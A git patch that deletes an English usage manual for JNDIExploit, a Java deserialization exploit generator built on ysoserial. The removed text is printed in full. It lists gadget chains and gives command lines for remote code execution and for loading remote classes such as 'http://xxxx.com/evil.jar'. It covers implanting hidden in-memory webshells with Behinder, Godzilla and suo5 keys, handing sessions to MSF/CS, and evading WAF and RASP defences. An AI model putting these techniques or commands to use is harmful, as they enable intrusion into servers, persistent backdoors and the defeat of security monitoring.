From fef7cec7c0136f1670855b6d21a8e9d7ebf4b8a4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=82=81?= <75202638+qi4L@users.noreply.github.com> Date: Tue, 11 Jul 2023 09:46:10 +0800 Subject: [PATCH] Destroyed ysoserialEN (markdown) --- ysoserialEN.md | 399 ------------------------------------------------- 1 file changed, 399 deletions(-) delete mode 100644 ysoserialEN.md diff --git a/ysoserialEN.md b/ysoserialEN.md deleted file mode 100644 index d204e06..0000000 --- a/ysoserialEN.md +++ /dev/null @@ -1,399 +0,0 @@ - - -项目支持利用链展示: - -```text -[root]#~ Shout Out to Yzmm / Shxjia / Y4er / N1nty / C0ny1 / Phith0n / Kezibei -[root]#~ AND OF COURSE TO THE All MIGHTY @frohoff -[root]#~ Usage: java -jar JNDIExploit-[version].jar -yso 1 -g [payload] -p '[command]' [options] -[root]#~ Available payload types: -log4j:WARN No appenders could be found for logger (org.reflections.Reflections). -log4j:WARN Please initialize the log4j system properly. -log4j:WARN See http://logging.apache.org/log4j/1.2/faq.html#noconfig for more info. - Payload Authors Dependencies - ------- ------- ------------ - AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2 - AspectJWeaver2 aspectjweaver:1.9.2, commons-collections:3.2.2 - BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5 - BeanShell20b4 bsh:2.0b4 - C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11 - C3P02 c3p0:0.9.5.2, mchange-commons-java:0.2.11, tomcat:8.5.35 - C3P03 c3p0:0.9.5.2, mchange-commons-java:0.2.11, tomcat:8.5.35, groovy:2.3.9 - C3P04 c3p0:0.9.5.2, mchange-commons-java:0.2.11, tomcat:8.5.35, snakeyaml:1.30 - C3P092 @mbechler c3p0:0.9.2-pre2-RELEASE ~ 0.9.5-pre8, mchange-commons-java:0.2.11 - Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0 - Clojure @JackOfMostTrades clojure:1.8.0 - CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 - CommonsBeanutils1183NOCC commons-beanutils:1.8.3 - CommonsBeanutils2 commons-beanutils:1.9.2 - CommonsBeanutils2183NOCC commons-beanutils:1.8.3, commons-logging:1.2 - CommonsBeanutils3 commons-beanutils:1.9.2, commons-collections:3.1 - CommonsBeanutils3183 commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 - CommonsBeanutils4 commons-beanutils:1.9.2, commons-collections:3.1 - CommonsBeanutilsAttrCompare @水滴 commons-beanutils:1.9.2 - CommonsBeanutilsAttrCompare183 @SummerSec commons-beanutils:1.8.3 - CommonsBeanutilsObjectToStringComparator @水滴 commons-beanutils:1.9.2, commons-lang3:3.10 - CommonsBeanutilsObjectToStringComparator183 @SummerSec commons-beanutils:1.8.3, commons-lang3:3.10 - CommonsBeanutilsPropertySource @SummerSec commons-beanutils:1.9.2, log4j-core:2.17.1 - CommonsBeanutilsPropertySource183 @SummerSec commons-beanutils:1.9.2, log4j-core:2.17.1 - CommonsCollections1 @frohoff commons-collections:3.1 - CommonsCollections10 commons-collections:3.2.1 - CommonsCollections11 - CommonsCollections2 @frohoff commons-collections4:4.0 - CommonsCollections3 @frohoff commons-collections:3.1 - CommonsCollections4 @frohoff commons-collections4:4.0 - CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1 - CommonsCollections6 @matthias_kaiser commons-collections:3.1 - CommonsCollections6Lite @matthias_kaiser commons-collections:3.1 - CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1 - CommonsCollections8 @navalorenzo commons-collections4:4.0 - CommonsCollections9 commons-collections:3.2.1 - CommonsCollectionsK1 @KORLR commons-collections:<=3.2.1 - CommonsCollectionsK2 @KORLR commons-collections4:4.0 - FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4 - Groovy1 @frohoff groovy:2.3.9 - Hibernate1 @mbechler hibernate-core:4.3.11.Final, aopalliance:1.0, jboss-logging:3.3.0.Final, javax.transaction-api:1.2, dom4j:1.6.1 - Hibernate2 @mbechler hibernate-core:4.3.11.Final, aopalliance:1.0, jboss-logging:3.3.0.Final, javax.transaction-api:1.2, dom4j:1.6.1 - JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 - JRE8u20 @frohoff - JRE8u20_2 - JRMPClient @mbechler - JRMPClient_Activator @mbechler - JRMPClient_Obj @mbechler - JRMPListener @mbechler - JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 - JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 - Jdk7u21 @frohoff - Jdk7u21variant @potats0 - Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2 - MozillaRhino1 @matthias_kaiser js:1.7R2 - MozillaRhino2 @_tint0 js:1.7R2 - Myfaces1 @mbechler - Myfaces2 @mbechler myfaces-impl:2.2.9, myfaces-api:2.2.9, apache-el:8.0.27, javax.servlet-api:3.1.0, mockito-core:1.10.19, hamcrest-core:1.1, objenesis:2.1 - ROME @mbechler rome:1.0 - ROME2 rome:1.0 - ROME3 @Firebasky rome:1.0 - SignedObject - Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE - Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 - Spring3 spring-tx:5.2.3.RELEASE, spring-context:5.2.3.RELEASE, javax.transaction-api:1.2 - URLDNS @gebl - Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14 - Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4 - - -usage: JNDIExploit-[version].jar [-ch ] [-dcfp ] [-dl ] [-dt ] [-et] [-f ] [-g ] [-gen] [-gzk ] - [-h] [-hk ] [-ht ] [-hv ] [-i] [-j] [-mcl] [-n ] [-ncs] [-o] [-p ] [-pw ] [-u ] - - -g,--gadget Java deserialization gadget - -p,--parameters Gadget parameters - -u,--url MemoryShell binding url pattern,default [/version.txt] - -pw,--password Behinder or Godzilla password,default [p@ssw0rd] - -gzk,--godzilla-key Godzilla key,default [key] - -hk,--header-key MemoryShell Header Check,Request Header Key,default [Referer] - -hv,--header-value MemoryShell Header Check,Request Header Value,default [https://nu1r.cn/] - -ch,--cmd-header Request Header which pass the command to Execute,default [X-Token-Data] - -h,--hide-mem-shell Hide memory shell from detection tools (type 2 only support SpringControllerMS) - -ht,--hide-type Hide memory shell,type 1:write /jre/lib/charsets.jar 2:write /jre/classes/ - -f,--file Write Output into FileOutputStream (Specified FileName) - -gen,--gen-mem-shell Write Memory Shell Class to File - -i,--inherit Make payload inherit AbstractTranslet or not (Lower JDK like 1.6 should inherit) - -j,--jboss Using JBossObjectInputStream/ObjectOutputStream - -mcl,--mozilla-class-loader Using org.mozilla.javascript.DefiningClassLoader in TransformerUtil - -n,--gen-mem-shell-name Memory Shell Class File Name - -ncs,--no-com-sun Force Using org.apache.XXX.TemplatesImpl instead of com.sun.org.apache.XXX.TemplatesImpl - -o,--obscure Using reflection to bypass RASP - -dcfp,--define-class-from-parameter Customize parameter name when using DefineClassFromParameter - -dt,--dirty-type Using dirty data to bypass WAF,type: 1:Random Hashable Collections/2:LinkedList Nesting/3:TC_RESET in Serialized Data - -dl,--dirty-length Length of dirty data when using type 1 or 3/Counts of Nesting loops when using type 2 - -et,--encrypted-transcoder Encode By EncryptedTranscoder - -Recommended Usage: -g [payload] -p '[command]' -dt 1 -dl 50000 -o -i -If you want your payload being extremely short,you could just use: -java -jar JNDIExploit-[version].jar -yso 1 -g [payload] -p '[command]' -``` - -# How to use - -In the original exploit method, only a single `java.lang.Runtime.getRuntime().exec()` is used to execute arbitrary commands for the exploit method using TemplatesImpl; for the exploit method using ChainedTransformer -The way of exploitation is only chained with a Runtime exec, and the exploit is too limited and single. Therefore, this project expands different utilization methods on the basis of the original project for selection in actual combat environments. - -## for TemplatesImpl - -The original version only used the command execution method of Runtime. Here it is deeply expanded and a variety of memory horse functions are embedded. - -### Extended attack - memory horse and echo - -If you use these exploit chains to attack, this project has built-in some advanced extended usages, and the commands start with `EX-`, including memory horses, command execution echo, etc., as follows: - -Command execution echo: - -- Command `EX-AllEcho`: DFS finds the Request command to execute the echo -- Command `EX-TomcatEcho`: Tomcat command execution echo -- Command `EX-SpringEcho`: Spring command execution echo -- Command `EX-JbossEcho`: Jboss command execution echo -- Command `EX-jettyEcho`: Jetty command execution echo -- Command `EX-LinuxEcho1`: Linux command execution echo -- Command `EX-LinuxEcho2`: Linux command execution echo -- Command `EX-resinEcho`: Resin command execution echo -- Command `EX-weblogicEcho`: Weblogic command execution echo -- Command `EX-WindowsEcho`: Windows command execution echo - -Solve the problem of Shiro Header being too long: - -- Command `EX-DefineClassFromParameter`: Obtain the value of the specified parameter from the request for class loading - -Memory horse: - -- Command `EX-MS-SpringInterceptorMS-...`: Implant Spring interceptor-type memory horses into the system -- Command `EX-MS-SpringControllerMS-...`: Implant Spring Controller-type memory horses into the system -- Command `EX-MS-SpringWebfluxMS-...`: Implant Spring WebFilter type memory horse into the system (only gz and cmd are supported) -- Command `EX-MS-TFMSFromJMX-...`: Use JMX MBeans to implant Tomcat Filter-type memory horses into the system -- Command `EX-MS-TFMSFromRequest-...`: Implant the Tomcat Filter type memory horse into the system by finding the Request in the thread group -- Command `EX-MS-TFMSFromThread-...`: Obtain the specified context through the thread class loader to implant the Tomcat Filter type memory horse into the system -- Command `EX-MS-TLMSFromThread-...`: Obtain the specified context through the thread class loader to implant the Tomcat Listener type memory horse into the system -- Command `EX-MS-TSMSFromJMX-...`: Use JMX MBeans to implant Tomcat Servlet-type memory horses into the system -- Command `EX-MS-TSMSFromRequest-...`: Implant Tomcat Servlet type memory horse into the system by finding Request in the thread group -- Command `EX-MS-TSMSFromThread-...`: Obtain the specified context through the thread class loader to implant the Tomcat Servlet type memory horse into the system -- Command `EX-MS-JBFMSFromContext-...`: implant JBoss/Wildfly Filter-type memory horses into the system through the global context -- Command `EX-MS-JBSMSFromContext-...`: implant JBoss/Wildfly Servlet type memory horse into the system through the global context -- Command `EX-MS-JFMSFromJMX-...`: Use JMX MBeans to implant Jetty Filter-type memory horses into the system -- Command `EX-MS-JSMSFromJMX-...`: Use JMX MBeans to implant Jetty Servlet-type memory horses into the system -- Command `EX-MS-RFMSFromThread-...`: Obtain the specified context through the thread class loader and implant the Resin Filter type memory horse into the system -- Command `EX-MS-RSMSFromThread-...`: Obtain the specified context through the thread class loader and implant the Resin Servlet type memory horse into the system -- Command `EX-MS-WSFMSFromThread-...`: Get the specified context through the thread class loader and implant the Websphere Filter type memory horse into the system -- Command `EX-MS-RMIBindTemplate-...`: RMI type memory horse - -The currently supported types of direct memory horses include Tomcat, Jetty, JBoss/Wildfly, Websphere, Resin, and Spring. - -And you can specify the type of memory key through keywords, such as Ice Scorpion memory key, Godzilla Base64 memory key, Godzilla RAW memory key, CMD command echo key, etc. The usage examples are as follows: - -- `EX-MS-TSMSFromThread-bx`: `Ice Scorpion` logical memory horse -- `EX-MS-TSMSFromThread-gz`: `Godzilla` Base64 logical memory horse -- `EX-MS-TSMSFromThread-gzraw`: `Godzilla` RAW logical memory horse -- `EX-MS-TSMSFromThread-cmd`: `CMD` command echo memory horse -- `EX-MS-TSMSFromThread-suo5`: `suo5` suo5 tunnel horse - -In addition, this project currently supports Tocmat WebSocket, Upgrade, and Executor commands to execute memory horses. It has not yet been expanded into multiple types (because related tools do not support them and need to be modified). Examples of usage are as follows: - -Agent-type memory horses without files landed. By modifying the key class bytecodes of the system, the memory horses are implanted without any files landed. The whole process is operated in the memory, which can bypass various protections and detections. The usage method `EX-Agent-Lin /Win-Filter/Servlet-bx/gzraw/gz/cmd` currently distinguishes between Win/Lin operating systems, and supports Servlet, Tomcat Filter memory horses, and will continue to update some Hook points, such as: - -- `EX-Agent-Lin-Filter-bx`: Ice Scorpion Agent type memory horse that modifies the bytecode of Tomcat Filter on Linux system - -All memory shells supported by this tool have been tested and available, but they are actually limited by the middleware version. For related tests of memory shells, you can refer to the project [https://github.com/su18/MemoryShell](https://github. com/su18/MemoryShell) - -## for ChainedTransformer - -- CommonsCollections1 -- CommonsCollections5 -- CommonsCollections6 -- CommonsCollectionsK3 -- CommonsCollectionsK4 -- CommonsCollections7 -- commonscollectionsK5 -- CommonsCollections9 - -This project expands its various utilization methods except Runtime execution commands, as follows: - -- TS : Thread Sleep - Check for deserialization vulnerabilities through `Thread.sleep()`, use the command: `TS-10` -- RC: Remote Call - via `URLClassLoader.loadClass()` - To call the remote malicious class and initialize it, use the command: `RC-http://xxxx.com/evil.jar#EvilClass` -- WF: Write File - write to a file via `FileOutputStream.write()`, use the command: `WF-/tmp/shell#d2hvYW1p` -- PB: ProcessBuilder executes system commands through `ProcessBuilder.start()`, use the command `PB-lin-d2hvYW1p` / `PB-win-d2hvYW1p` - Execute commands on different operating systems -- SE: ScriptEngine - Parse JS code and call Runtime through `ScriptEngineManager.getEngineByName('js').eval()` - To execute the command, use the command `SE-d2hvYW1` -- DL: DNS LOG - trigger DNS resolution via `InetAddress.getAllByName()`, use the command `DL-xxxdnslog.cn` -- HL: HTTP LOG - trigger HTTP LOG through `URL.getContent()`, use the command `HL-http://xxx.com` -- BC: BCEL Classloader - load BCEL via `..bcel...ClassLoader.loadClass().newInstance()` - Class bytecode, use the command `BC-$BCEL$xxx`, you can also use `BC-EX-TomcatEcho` or `BC-LF-/tmp/aaa.class` to perform advanced functions -- JD: JNDI Lookup - trigger JNDI injection via `InitialContext.lookup()`, use the command `JD-ldap://xxx/xx` -- Other: common command execution - Execute system commands through `Runtime.getRuntime().exec()`, use the command `whoami` - -It should be noted here that when using PB to execute system commands, WF to write the content of files, and SE to execute commands, in order to prevent parameter passing errors, you need to use for the incoming commands -base64 encoded. - -In addition to the above utilization, the project also supports the writing method of `EX-` through ScriptEngineManager to execute JS, that is to say, the utilization method of ChainedTransformer can also be inserted into the memory horse or echoed. - -**Command execution example**: - -```shell -java -jar JNDIExploit-[version].jar -yso 1 -g CommonsCollections1 -p PB-lin-b3BlbiAtYSBDYWxjdWxhdG9yLmFwcA== -``` - -**DNSLOG example**: - -```shell -java -jar JNDIExploit-[version].jar -yso 1 -g CommonsCollections1 -p 'DL-xxx.org' -``` - -**Script engine parsing JS code example**: - -```shell -java -jar JNDIExploit-[version].jar -yso 1 -g CommonsCollections1 -p 'SE-b3BlbiAtYSBDYWxjdWxhdG9yLmFwcA==' -``` - -**File writing example**: - -```shell -java -jar JNDIExploit-[version].jar -yso 1 -g CommonsCollections1 -p 'WF-/tmp/1.jsp#PCVAcGFnZSBwYWdlR.....' -``` - -**Example of triggering JNDI query injection**: - -```shell -java -jar JNDIExploit-[version].jar -yso 1 -g CommonsCollections1 -p 'JD-ldap://127.0.0.1:1389/Basic/Command/Base64/b3BlbiAtYSBDYWxjdWxhdG9yLmFwcA==' -``` - -**Common command execution example**: - -```shell -java -jar JNDIExploit-[version].jar -yso 1 -g CommonsCollections1 -p 'open -a Calculator.app' -``` - -### Any custom code - -If you don't want to use the malicious logic provided in this project, and don't want to execute commands, you can use the form of custom code, which will pass ClassLoader on the target server - -[//]: # (Load and instantiate. The command starts with `LF-`, followed by the absolute path of the specified custom class bytecode file, and the program will try to automatically reduce the size of the class bytecode.) - -Example: - -```shell -java -jar JNDIExploit-[version].jar -yso 1 -g CommonsCollections3 -p LF-/tmp/evil.class -``` - -### Normal command execution - -The last is the ordinary execution command, just enter the command to be executed directly. - -**Common command execution example**: - -```shell -java -jar JNDIExploit-[version].jar -yso 1 -g CommonsBeanutils2 -p 'open -a Calculator.app' -``` - -## URLDNS probe target class - -In order to solve the situation where there are deserialization utilization points but no chain is available, this project provides the function of detecting target classes based on URLDNS. This chain will judge the system environment and dependency version according to whether different classes exist in the target environment, mainly including the contents in the following table: - -| DNSLOG 关键字 | 对应链 | 关键类 | 备注 | -| ------------------------------------------- | ----------------------- | ------------------------------------------------------------ | ------------------------------------------------------------ | -| cc31or321
cc322 | CommonsCollections13567 | org.apache.commons.collections.functors.ChainedTransformer
org.apache.commons.collections.ExtendedProperties$1 | CommonsCollections1/3/5/6/7
需要<=3.2.1版本 | -| cc40
cc41 | CommonsCollections24 | org.apache.commons.collections4.functors.ChainedTransformer
org.apache.commons.collections4.FluentIterable | CommonsCollections2/4链
需要4-4.0版本 | -| cb17
cb18x
cb19x | CommonsBeanutils2 | org.apache.commons.beanutils.MappedPropertyDescriptor\$1
org.apache.commons.beanutils.DynaBeanMapDecorator\$MapEntry
org.apache.commons.beanutils.BeanIntrospectionData | 1.7x-1.8x为-3490850999041592962
1.9x为-2044202215314119608 | -| c3p092x
c3p095x | C3P0 | com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase
com.mchange.v2.c3p0.test.AlwaysFailDataSource | 0.9.2pre2-0.9.5pre8为7387108436934414104
0.9.5pre9-0.9.5.5为7387108436934414104 | -| ajw | AspectJWeaver | org.aspectj.weaver.tools.cache.SimpleCache | AspectJWeaver,需要cc31 | -| bsh20b4
bsh20b5
bsh20b6 | bsh | bsh.CollectionManager\$1
bsh.engine.BshScriptEngine
bsh.collection.CollectionIterator\$1 | 2.0b4为4949939576606791809
2.0b5为4041428789013517368
2.0.b6无法反序列化 | -| groovy1702311
groovy24x
groovy244 | Groovy | org.codehaus.groovy.reflection.ClassInfo\$ClassInfoSet
groovy.lang.Tuple2
org.codehaus.groovy.runtime.dgm\$1170 | 2.4.x为-8137949907733646644
2.3.x为1228988487386910280 | -| becl | Becl | com.sun.org.apache.bcel.internal.util.ClassLoader | JDK<8u251 | -| Jdk7u21 | Jdk7u21 | com.sun.corba.se.impl.orbutil.ORBClassLoader | JDK<=7u21 | -| JRE8u20 | JRE8u20 | javax.swing.plaf.metal.MetalFileChooserUI\$DirectoryComboBoxModel\$1 | 7u25<=JDK<=8u20
这个检测不完美,8u25版本以及JDK<=7u21会误报
可综合Jdk7u21来看 | -| linux
windows | winlinux | sun.awt.X11.AwtGraphicsConfigData
sun.awt.windows.WButtonPeer | windows/linux版本判断 | -| | all | | 全部检测 | - -This project refers to the URLDNS project of master kezibei. The actual situation may cause problems in the following situations: - -- Encountered a blacklist when deserializing, which may cause the dnslog of the following class to fail to come out; -- During the deserialization process, errors may be reported due to various situations, which may lead to failure. - -Therefore, three detection methods of all/common/specified classes are provided here: - -- all: detect all classes; -- common: detect CommonsBeanutils2/C3P0/AspectJWeaver/bsh/winlinux that are not often in the blacklist; -- Specified class: use the keyword CommonsCollections24:xxxx.dns.log in the corresponding chain. - -Example: `all:xxxxxx.dns.log` - -```shell -java -jar JNDIExploit-[version].jar -yso 1 -g URLDNS -p 'all:xxxxxx.dns.log' -``` - -## Expansion of other utilization chains - -For BeanShell1 and Clojure, two scripting language parsing-based exploit methods. - -This project expands a variety of utilization methods for these two utilization chains except Runtime execution commands, as follows: - -- TS : Thread Sleep - Check for deserialization vulnerabilities through `Thread.sleep()`, use the command: `TS-10` -- RC: Remote Call - Call remote malicious class and initialize it through `URLClassLoader.loadClass()`, use the command: `RC-http://xxxx.com/evil.jar#EvilClass` -- WF : Write File - write files through `FileOutputStream.write()`, use the command: `WF-/tmp/shell#123` -- Others: common command execution - Execute system commands through `ProcessBuilder().start()`, use the command `whoami` - -Similar to the previous extension, no screenshots are shown here. - -For BeanShell1, the way of executing JS through ScriptEngineManager also supports echo or memory horse entry. The usage is the same as above: `EX-` - -## MSF/CS is live - -Use the online load of MSF to cooperate with the remote Jar package call to complete the online MSF, and then transfer to CS. - -# Use of memory horses - -For the various memory horses entered by one key in the project, here is a general utilization method. - -## Command execution and backdoor class - -For the implanted memory horse and malicious logic, first of all, in order to hide the memory horse, it is judged through logic. It is necessary to add `Referer: https://su18.org/` in the request header, and then execute different logic: -The header and value of this verification can be customized through `-hk "Referer" -hv "https://su18.org/"`. - -1. If it is a CMD memory horse, the program will read the command to be executed from `X-Token-Data` and echo the execution result. This header can Pass `-ch "testecho"` to specify. - -2. If it is a Ice Scorpion Shell memory horse, you can use the Ice Scorpion client for connection management, the password `p@ssw0rd`, you can pass `-pw "1qaz@WSX"` to specify. - -3. If it is a Godzilla shell memory horse, you can use the Godzilla client for connection management, set the pass value to `p@ssw0rd`, and set the key to `key` , the Godzilla memory horse supports both RAW and Base64, which can be specified by `-pw "1qaz@WSX" -gzk "evilkey"`. - -4. If it is a suo5 memory horse, it will directly create a suo5 tunnel, which can be directly connected by the suo5 client. Suo5 currently supports the authentication of the custom Header It can be specified by parameters `-hk "User-Agent" -hv "aaaawww"` when generating, and it can be connected normally as follows: - - Configure it in configuration. - - Project address: [https://github.com/zema1/suo5](https://github.com/zema1/suo5), this project is still being actively updated, and relevant codes will be updated from time to time to support related functions. - -5. If it is a WebSocket memory horse, you can use the WebSocket client to link, the path is `/version.txt`, you can use `-u "/aaa"` to specify. - -6. If it is a Tomcat Executor memory horse, the program will read the command to be executed from the `X-Token-Data` in the Header, and put the execution result in the Header `Server -token` performs Base64encode echo, you can use `-ch "testecho"` to specify. - -7. If it is a Tomcat Upgrade memory horse, you need to specify `Connection: Upgrade` and `Upgrade: version.txt`, the program will read from `X-Token-Data` in the Header Read the command to be executed, and return the result to the response for echo, you can use `-u "/aaa" -ch "testecho"` to specify. - -## Echo class - -The echo of the Echo class is based on finding the request with the specified Header in the thread group, executing the command and echoing it. - -When using, add `X-Token-Data` to the Header, its value is the command to be executed, and the command execution result will be echoed in the response. - -## RMI memory horse - -For RMIBindTemplate -Start the registry on the specified port on the target server (if not), and bind the malicious backdoor class to it, cooperate with `exploit.org.qi.ysuserial.RMIBindExploit` -perform command execution - -![](https://gallery-1304405887.cos.ap-nanjing.myqcloud.com/markdowniShot_2022-08-12_18.19.48.png) - -# Defense bypass - -This part does not involve the usage method, but simply describes the bypass method used in the project for everyone to understand. - -## traffic level - -For Ice Scorpion and Godzilla, they have many characteristics that can be extracted in the traffic and Java layers. There is no way to control them here. You need to modify them yourself, which is actually not difficult. This project removes some similar features that everyone has implemented. - -In some cases, WAF at the traffic layer will match keywords and key features when parsing traffic packets, such as the package names and class names of some key classes that appear in deserialized traffic packets, but traffic devices are limited Due to performance impact, there will be no unlimited parsing of request packets, which may affect actual business, so there will generally be `time` for parsing -or the threshold on `length` above which the check will be discarded. - -Therefore, this project adds the function of adding dirty data to deserialized data to bypass WAF at the traffic level. When generating deserialized data, specify the -dt parameter to generate encapsulated data with random dirty data according to different types. Deserialized packet of characters. - -For example: - -```shell -java -jar JNDIExploit-[version].jar -yso 1 -g CommonsBeanutils1 -p 'EX-MS-TEXMSFromThread' -dt 1 -dl 50000 -``` - -Can generate serialized data padded with 50000 dirty characters - -## RASP level - -For the Runtime, URLClassLoader, etc. that are commonly used in vulnerability execution, many RASPs have implemented Hooks, which may be intercepted during attacks. Here I use some technologies such as reflection calling native methods to try RASP -The defense, the specific technical implementation will not go into details, interested friends can decompile the jar package to view the relevant code. The use of related techniques to bypass RASP can be specified using the -o parameter. - -Currently, it supports dynamically generating obfuscated class names without any `qi4l` keyword. -